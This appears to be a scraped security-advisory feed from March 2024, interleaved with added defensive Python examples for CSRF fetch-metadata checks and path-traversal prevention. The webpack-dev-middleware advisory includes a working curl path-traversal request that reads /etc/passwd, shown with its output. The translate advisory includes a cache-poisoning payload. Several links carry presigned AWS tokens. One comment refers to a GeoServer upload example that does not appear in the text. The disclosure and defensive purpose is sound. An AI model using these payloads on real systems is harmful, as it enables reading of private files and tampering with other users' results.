A system administrator responsible for running GeoServer can define the ``GEOSERVER_LOG_LOCATION`` parameter, preventing the global setting provided through the admin console from being used. The ``GEOSERVER_LOG_LOCATION`` parameter can be set as a system property, environment variable, or servlet context parameter.
Environment variable:
```bash
export GEOSERVER_LOG_LOCATION=/var/opt/geoserver/logs
```
System property:
```bash
-DGEOSERVER_LOG_LOCATION=/var/opt/geoserver/logs
```
Web application ``WEB-INF/web.xml``:
```xml
<context-param>
  <param-name>GEOSERVER_LOG_LOCATION</param-name>
  <param-value>/var/opt/geoserver/logs</param-value>
</context-param>
```
Tomcat **conf/Catalina/localhost/geoserver.xml**:
```xml
<Context>
  <Parameter name="GEOSERVER_LOG_LOCATION" value="/var/opt/geoserver/logs" override="false"/>
</Context>
```
### References
* [Log location](https://docs.geoserver.org/latest/en/user/configuration/globalsettings.html#log-location) (User Manual)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8G7V-VJRC-X4G5
20.03.2024 16:30:19ubuntu[USN-6705-1] Linux kernel (AWS) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6705-1
20.03.2024 16:23:19ubuntu[USN-6704-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-1
20.03.2024 15:09:50ubuntu[USN-6686-4] Linux kernel (KVM) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-4
20.03.2024 13:15:08alpinelinux[ALPINE:CVE-2023-46839] xen vulnerability[From CVE-2023-46839] PCI devices can make use of a functionality called phantom functions, that when enabled allows the device to generate requests using the IDs of functions that are otherwise unpopulated. This allows a device to extend the number of outstanding requests. Such phantom functions need an IOMMU context setup, but failure to setup the context is not fatal when the device is assigned. Not failing device assignment when such failure happens can lead to the primary device being assigned to a guest, while some of the phantom functions are assigned to a different domain.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46839
20.03.2024 13:15:08alpinelinux[ALPINE:CVE-2023-46841] xen vulnerability[From CVE-2023-46841] Recent x86 CPUs offer functionality named Control-flow Enforcement Technology (CET). A sub-feature of this is Shadow Stacks (CET-SS). CET-SS is a hardware feature designed to protect against Return Oriented Programming attacks. When enabled, traditional stacks holding both data and return addresses are accompanied by so called "shadow stacks", holding little more than return addresses. Shadow stacks aren't writable by normal instructions, and upon function returns their contents are used to check for possible manipulation of a return address coming from the traditional stack. In particular certain memory accesses need intercepting by Xen. In various cases the necessary emulation involves a kind of replaying of the instruction. Such replaying typically involves filling and then invoking a stub. Such a replayed instruction may raise an exception, which is expected and dealt with accordingly. Unfortunately the interaction of both of the above wasn't right: recovery involves removal of a call frame from the (traditional) stack, and the counterpart of this operation for the shadow stack was missing.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46841
20.03.2024 09:00:00msrc[MS:CVE-2024-28916] Xbox Gaming Services Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-28916
20.03.2024 07:48:06ubuntu[USN-6703-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6703-1
20.03.2024 17:38:52maven[MAVEN:GHSA-8VVP-525H-CXF9] Cross-Site Request Forgery in Apache Wicket (moderate)An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket.This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series.Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected.Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VVP-525H-CXF9
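The advisory says only that the evaluation of the fetch metadata headers was wrong, not how. As an added reference point (not Wicket's code), the function below implements the usual fetch-metadata resource isolation policy in a fail-closed way: only explicitly recognised `Sec-Fetch-Site` values are trusted, any other token is treated as cross-site, and a request with no fetch metadata at all falls back to an Origin check instead of being waved through. The `trusted_origins` parameter and the header dictionaries in the usage are the example's own.

```python
SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS"})


def request_allowed(method, headers, trusted_origins=()):
    """Resource Isolation Policy built on Fetch Metadata.

    Returns True if the request may reach the application. Every branch that
    cannot positively establish where the request came from fails closed: an
    unexpected or malformed Sec-Fetch-Site value counts as cross-site, never
    as "unknown, so allow"."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    method = method.upper()
    site = h.get("sec-fetch-site")

    if site is None:
        # No Fetch Metadata (older browser or non-browser client). Fall back to
        # the Origin header rather than accepting blindly. Safe methods with no
        # Origin are let through because they must not change state anyway.
        origin = h.get("origin")
        if origin is None:
            return method in SAFE_METHODS
        return origin in trusted_origins

    site = site.lower()
    if site in ("same-origin", "same-site", "none"):
        return True
    if site != "cross-site":
        return False  # unrecognised token: fail closed

    # Cross-site requests: only top-level navigations with a safe method, and
    # not those that embed the response (<object>/<embed>), are allowed.
    mode = h.get("sec-fetch-mode", "").lower()
    dest = h.get("sec-fetch-dest", "").lower()
    return method in SAFE_METHODS and mode == "navigate" and dest not in ("object", "embed")
```

The `same-site` branch follows the common policy and accepts requests from sibling subdomains; if those are not under your control, narrow it to `same-origin` only. Run the check before any state-changing handler, and keep a token-based CSRF defence alongside it for clients that never send these headers.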
20.03.2024 17:31:47maven[MAVEN:GHSA-F6G6-PJGC-5CJ5] Improper Input Validation vulnerability in Apache Hop Engine (moderate)Improper Input Validation vulnerability in Apache Hop Engine. This issue affects Apache Hop Engine: before 2.8.0.Users are recommended to upgrade to version 2.8.0, which fixes the issue.When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped.The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low.This issue only affects users using the Hop Server component and does not directly affect the client.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F6G6-PJGC-5CJ5
21.03.2024 22:19:05ubuntu[USN-6700-2] Linux kernel (AWS) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6700-2
21.03.2024 20:59:29npm[NPM:GHSA-WR3J-PWJ9-HQQ6] Path traversal in webpack-dev-middleware (high)
### Summary
_The **webpack-dev-middleware** middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine._
### Details
The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory _memfs_ filesystem. If the _writeToDisk_ configuration option is set to **true**, the physical filesystem is used:
[https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21](https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21)
The _**getFilenameFromUrl**_ method is used to parse the URL and build the local file path. The public path prefix is stripped from the URL, and the **unescaped** path suffix is appended to the _outputPath_:
[https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82](https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82)
As the URL is not unescaped and normalized automatically before calling the middleware, it is possible to use _%2e_ and _%2f_ sequences to perform a path traversal attack.
### PoC
_A blank project can be created containing the following configuration file **webpack.config.js**:_
```js
module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
```
When started, it is possible to access any local file, e.g. _/etc/passwd_:
```
$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
```
### Impact
Developers using _webpack-dev-server_ or _webpack-dev-middleware_ are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. passwords, configuration files, private source code, ...).
If the development server is listening on a public IP address (or **0.0.0.0**), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, **_Access-Control-Allow-Origin: *_**), an attacker can send a malicious link to the victim. When visited, the client-side script can connect to the local server and exfiltrate the local files.
### Recommendation
The URL should be unescaped and normalized before any further processing.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WR3J-PWJ9-HQQ6
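The GeoServer coverage-store upload above (`filename=../../...` joined onto a store path) and this webpack-dev-middleware entry (`..%2f` sequences that are never decoded before the file path is built) are the same defect: a user-controlled path is attached to a base directory without decoding, normalising and then checking containment, in that order. The function below is an added example, not code from either project, of the check done in the right order; the base directory, the symlink and the file names used in the test are constructed.

```python
import os
import posixpath
from urllib.parse import unquote


class PathTraversal(ValueError):
    """Raised when an untrusted path would resolve outside its base directory."""


def resolve_under(base_dir, user_path):
    """Map an untrusted relative path (as received in a URL or query parameter)
    onto a filesystem path below base_dir, or raise PathTraversal.

    Order matters: percent-decode first (so "..%2f" becomes "../"), then
    normalise lexically, then resolve symlinks, and only then compare the
    result against the base directory."""
    base = os.path.realpath(base_dir)

    decoded = unquote(user_path)  # one decoding pass, as the web server would do
    if "\x00" in decoded:
        raise PathTraversal("NUL byte in path")
    # Treat backslash as a separator, as a Windows host would; on POSIX this
    # only rejects names that legitimately contain a backslash.
    decoded = decoded.replace("\\", "/")

    # Lexical check: reject absolute paths and anything that still climbs
    # above base once "." and ".." segments have been collapsed.
    normalized = posixpath.normpath(decoded)
    if posixpath.isabs(normalized) or normalized == ".." or normalized.startswith("../"):
        raise PathTraversal("path escapes base directory: %r" % user_path)

    # Physical check: a symlink inside base may still point outside it, and
    # realpath() follows it even when the final component does not exist yet.
    candidate = os.path.realpath(os.path.join(base, normalized))
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversal("resolved path escapes base directory: %r" % user_path)
    return candidate


def is_safe_path(base_dir, user_path):
    """Boolean form of resolve_under for callers that only need a verdict."""
    try:
        resolve_under(base_dir, user_path)
        return True
    except PathTraversal:
        return False
```

Rejecting rather than silently clamping (`normpath("/" + path)` would quietly turn `../../etc/passwd` into `/etc/passwd` under the base) is deliberate: a request that tries to climb out is an attack signal worth logging, not an input to be repaired.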
21.03.2024 18:53:43ubuntu[USN-6709-1] OpenSSL vulnerabilities (medium)Several security issues were fixed in OpenSSL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6709-1
21.03.2024 15:12:53ubuntu[USN-6707-2] Linux kernel (ARM laptop) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-2
21.03.2024 15:01:27ubuntu[USN-6704-2] Linux kernel (Raspberry Pi) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-2
21.03.2024 14:20:33ubuntu[USN-6708-1] Graphviz vulnerability (high)Graphviz could be made to crash if it opened a specially crafted config6a file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6708-1
21.03.2024 20:59:09maven[MAVEN:GHSA-9W38-P64V-XPMV] Apache Commons Configuration: StackOverflowError calling ListDelimiterHandler.flatten(Object, int) with a cyclical object tree (moderate)This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' calling 'ListDelimiterHandler.flatten(Object, int)' with a cyclical object tree.Users are recommended to upgrade to version 2.10.1, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9W38-P64V-XPMV
21.03.2024 20:58:54maven[MAVEN:GHSA-XJP4-HW94-MVP5] Apache Commons Configuration: StackOverflowError adding property in AbstractListDelimiterHandler.flattenIterator() (moderate)This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' when adding a property in 'AbstractListDelimiterHandler.flattenIterator()'.Users are recommended to upgrade to version 2.10.1, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XJP4-HW94-MVP5
21.03.2024 20:58:34 | npm | [NPM:GHSA-XGJ4-2HRF-J4XG] Cross-site scripting in Survey Creator (moderate) | Cross Site Scripting (XSS) vulnerability in SurveyJS Survey Creator v.1.9.132 and before, allows attackers to execute arbitrary code and obtain sensitive information via the title parameter in form. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGJ4-2HRF-J4XG
21.03.2024 20:58:23 | maven | [MAVEN:GHSA-4H5H-P23F-HJQF] SQL injection in Folio Spring Module Core (moderate) | A vulnerability was found in Folio Spring Module Core before 2.0.0. Affected by this issue is the function dropSchema of the file tenant/src/main/java/org/folio/spring/tenant/hibernate/HibernateSchemaService.java of the component Schema Name Handler. The manipulation leads to sql injection. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is d374a5f77e6b58e36f0e0e4419be18b95edcd7ff. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-257516. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4H5H-P23F-HJQF
21.03.2024 10:51:52 | almalinux | [ALSA-2024:1435] postgresql-jdbc security update (important) | postgresql-jdbc security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1435
21.03.2024 16:33:21 | almalinux | [ALSA-2024:1444] nodejs:16 security update (important) | nodejs:16 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1444
21.03.2024 14:39:03 | almalinux | [ALSA-2024:1436] postgresql-jdbc security update (important) | postgresql-jdbc security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1436
21.03.2024 09:08:57 | almalinux | [ALSA-2024:1438] nodejs security update (important) | nodejs security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1438
21.03.2024 14:51:00 | almalinux | [ALSA-2024:1431] ruby:3.1 security, bug fix, and enhancement update (moderate) | ruby:3.1 security, bug fix, and enhancement update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1431
22.03.2024 20:19:24 | go | [GO-2024-2659] Data exfiltration from internal networks in github.com/docker/docker (medium) | dockerd forwards DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics, so networks marked as 'internal' can unexpectedly forward DNS requests to an external nameserver. By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2659
22.03.2024 22:02:16 | npm | [NPM:GHSA-882J-4VJ5-7VMJ] Cache Poisoning Vulnerability (moderate) | ### Summary An attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. ### Details The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. ### PoC Take the following simple server allowing users to supply text and the language to translate to. ```javascript import translate from "translate"; import express from 'express'; const app = express(); app.use(express.json()); app.post('/translate', async (req, res) => { const { text, language } = req.body; const result = await translate(text, language); return res.json(result); }); const port = 3000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` We can send the following request to poison the cache: ``` {"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}} ``` ![Poisoning the cache](https://user-images.githubusercontent.com/44903767/285421743-ccfa3d9d-24cf-47b7-b805-0e4034cec82e.png) Now, any user that attempts to translate "I love you" to Dutch will get "I hate you" in Dutch as the response. ![The victim gets our poisoned data](https://user-images.githubusercontent.com/44903767/285422033-b3853ca2-8a5a-4875-91e8-ba2ef0258bc6.png) ### Impact An attacker can control the results other users may get | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-882J-4VJ5-7VMJ
22.03.2024 18:57:07 | npm | [NPM:GHSA-F5X3-32G6-XQ36] Denial of service while parsing a tar file due to lack of folders count validation (moderate) | ## Description: During some analysis today on npm's `node-tar` package I came across the folder creation process. Basically, if you provide node-tar with a path like this `./a/b/c/foo.txt` it would create every folder and sub-folder here (a, b and c) until it reaches the last folder to create `foo.txt`. In this case I noticed that there's no validation at all on the amount of folders being created; that said, we're actually able to consume the CPU and memory of the system running node-tar and even crash the nodejs client within a few seconds of running it using a path with too many sub-folders inside. ## Steps To Reproduce: You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it; you should get the same behavior as the video. ## Proof Of Concept: Here's a (https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/3i7uojw8s52psar6pg8zkdo4h9io?response-content-disposition=attachment%3B%20filename%3D%22tar-dos-poc.webm%22%3B%20filename%2A%3DUTF-8%27%27tar-dos-poc.webm&response-content-type=video%2Fwebm&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=1e8235d885f1d61529b7d6b23ea3a0780c300c91d86e925dd8310d5b661ddbe2) show-casing the exploit: ## Impact Denial of service by crashing the nodejs client when attempting to parse a tar archive, making it run out of heap memory and consuming server CPU and memory resources. ## Report resources [payload.txt](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/1e83ayb5dd3350fvj3gst0mqixwk?response-content-disposition=attachment%3B%20filename%3D%22payload.txt%22%3B%20filename%2A%3DUTF-8%27%27payload.txt&response-content-type=text%2Fplain&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=bad9fe731f05a63a950f99828125653a8c1254750fe0ca7be882e89ecdd449ae) [archive.tar.gz](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/ymkuh4xnfdcf1soeyi7jc2x4yt2i?response-content-disposition=attachment%3B%20filename%3D%22archive.tar.gz%22%3B%20filename%2A%3DUTF-8%27%27archive.tar.gz&response-content-type=application%2Fx-tar&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=5e2c0d4b4de40373ac0fe91908c2659141a6dd4ab850271cc26042a3885c82ea) ## Note This report was originally reported to the GitHub bug bounty program; they asked me to report it to you a month ago | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F5X3-32G6-XQ36
22.03.2024 23:22:19 | go | [GO-2024-2657] Unencrypted traffic between nodes with WireGuard in github.com/cilium/cilium (medium) | In Cilium clusters with WireGuard enabled and traffic matching Layer 7 policies: traffic that should be WireGuard-encrypted is sent unencrypted between a node's Envoy proxy and pods on other nodes, and traffic that should be WireGuard-encrypted is sent unencrypted between a node's DNS proxy and pods on other nodes. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2657
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-28916] Xbox Gaming Services Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-28916
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-26247] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26247
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-29057] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-29057
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2625] Chromium: CVE-2024-2625 Object lifecycle issue in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2625
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2626] Chromium: CVE-2024-2626 Out of bounds read in Swiftshader | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2626
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2627] Chromium: CVE-2024-2627 Use after free in Canvas | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2627
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2628] Chromium: CVE-2024-2628 Inappropriate implementation in Downloads | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2628
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2629] Chromium: CVE-2024-2629 Incorrect security UI in iOS | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2629
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2630] Chromium: CVE-2024-2630 Inappropriate implementation in iOS | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2630
22.03.2024 09:00:00 | msrc | [MS:CVE-2024-2631] Chromium: CVE-2024-2631 Inappropriate implementation in iOS | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2631
